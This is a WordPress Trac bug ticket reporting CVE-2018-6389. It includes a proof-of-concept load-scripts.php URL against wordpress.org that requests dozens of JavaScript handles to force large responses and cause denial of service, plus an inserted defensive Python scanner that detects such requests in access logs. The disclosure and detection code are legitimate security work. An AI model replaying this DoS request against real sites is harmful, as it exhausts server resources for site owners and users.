Make WordPress Core

Opened 5 years ago

Closed 5 years ago

#44943 closed defect (bug) (duplicate)

Using component with Known Vulnerability - Unpatched WordPress leading to DoS

Reported by: frontdoorpentest
Owned by:
Milestone:
Priority: normal
Severity: normal
Version:
Component: Script Loader
Keywords:
Focuses:
Cc:

Description

I would like to report a vulnerability that is categorized under "A9:2017-Using Components with Known Vulnerabilities" and can lead to denial of service.
Please read the report before marking it as not valid because of DoS (Note:- there has been no attempt made to DoS the freshbooks web application).

Vulnerability:- https://wordpress.org/ uses WordPress as a backend engine to run its web application, and using CVE-2018-6389 an anonymous user can cause denial of service. In this vulnerability an attacker will pass all the possible JavaScript libraries and the application tries to load all the functions and send them back in the response. Passing a large list of JS functions can consume a lot of processing to respond, and if done from various locations/IPs/browser tabs it can lead to DoS. This attack can generate up to a 3 MB response per request.

Url :- https://wordpress.org/wp-admin/load-scripts.php?load=eutil,common,wp-a11y,sack,quicktag,colorpicker,editor,wp-fullscreen-stu,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,prototype,scriptaculous-root,scriptaculous-builder,scriptaculous-dragdrop,scriptaculous-effects,scriptaculous-slider,scriptaculous-sound,scriptaculous-controls,scriptaculous,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-transfer

Possible fixes:-

  1. change default "admin" directory name (Security through obscurity)
  2. or apply some password protection to /wp-admin/ url

Impact:-

DoS of the site and application server

Please find the attached screenshot demonstrating the PoC.

Reference:-
https://hackerone.com/reports/335177
https://baraktawily.blogspot.com/2018/02/how-to-dos-29-of-world-wide-websites.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389

Note:- My intention was never to hamper this platform in any manner; I just wanted to report it in a responsible way.
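A defender-side check for the request pattern described in this ticket, added here as an example that is not part of the ticket, of WordPress, or of the reporter's PoC: it scans constructed access-log lines for load-scripts.php requests that ask for an unusually large number of script handles. The combined log format, the RFC 5737 test addresses and the MAX_HANDLES threshold are assumptions; the handle list in the sample is the one quoted in the ticket.

```python
import re
from urllib.parse import parse_qs, urlparse

# Combined log format: ip ident user [time] "METHOD path HTTP/x" status bytes ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|HEAD|POST) (\S+) [^"]*" (\d{3}) (\d+|-)')

# Assumed threshold: normal wp-admin pages ask for a handful of handles; the PoC passes dozens.
MAX_HANDLES = 25

def handle_count(path):
    """Distinct script handles a load-scripts.php / load-styles.php request asks for."""
    parsed = urlparse(path)
    if not parsed.path.endswith(("/load-scripts.php", "/load-styles.php")):
        return 0
    qs = parse_qs(parsed.query)
    # WordPress accepts load=a,b,c or chunked load[]= parts that it concatenates, then
    # keeps only [a-z0-9,_-] and de-duplicates; count what would actually be served.
    raw = "".join(qs.get("load", []) + qs.get("load[]", []))
    cleaned = re.sub(r"[^a-z0-9,_-]+", "", raw, flags=re.I)
    return len({h for h in cleaned.split(",") if h})

def scan_log(log_text, max_handles=MAX_HANDLES):
    """Return (client_ip, handle_count, response_bytes) for each request over the threshold."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, path, _status, size = m.groups()
        n = handle_count(path)
        if n > max_handles:
            hits.append((ip, n, 0 if size == "-" else int(size)))
    return hits

# Constructed sample log (RFC 5737 test addresses); the handle list is the ticket's PoC list.
POC_HANDLES = ("eutil,common,wp-a11y,sack,quicktag,colorpicker,editor,wp-ajax-response,"
               "wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,prototype,"
               "scriptaculous-root,scriptaculous-builder,scriptaculous-dragdrop,scriptaculous-effects,"
               "scriptaculous-slider,scriptaculous-sound,scriptaculous-controls,scriptaculous,cropper,"
               "jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind")
SAMPLE_LOG = "\n".join([
    '203.0.113.5 - - [10/Sep/2018:10:01:02 +0000] "GET /wp-admin/load-scripts.php?c=1&load%5B%5D=jquery-core,jquery-migrate&ver=4.9.8 HTTP/1.1" 200 98000 "-" "Mozilla/5.0"',
    f'198.51.100.7 - - [10/Sep/2018:10:01:03 +0000] "GET /wp-admin/load-scripts.php?load={POC_HANDLES} HTTP/1.1" 200 3100000 "-" "curl/7.58.0"',
    '203.0.113.5 - - [10/Sep/2018:10:01:04 +0000] "GET /wp-login.php HTTP/1.1" 200 2300 "-" "Mozilla/5.0"',
])

if __name__ == "__main__":
    for ip, n, size in scan_log(SAMPLE_LOG):
        print(f"{ip}: {n} handles requested, {size} bytes returned")
```

Pairing the handle count with the response size in the same line lets a rate-limit or WAF rule key on the oversized requests only, leaving normal wp-admin traffic untouched.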

Attachments (1)

1.JPG (391.7 KB) - added by frontdoorpentest 5 years ago.
screenshot of loaded js functions


Change History (2)

@frontdoorpentest
5 years ago

screenshot of loaded js functions

#1 @ocean90
5 years ago

  • Component changed from General to Script Loader
  • Milestone Awaiting Review deleted
  • Resolution set to duplicate
  • Status changed from new to closed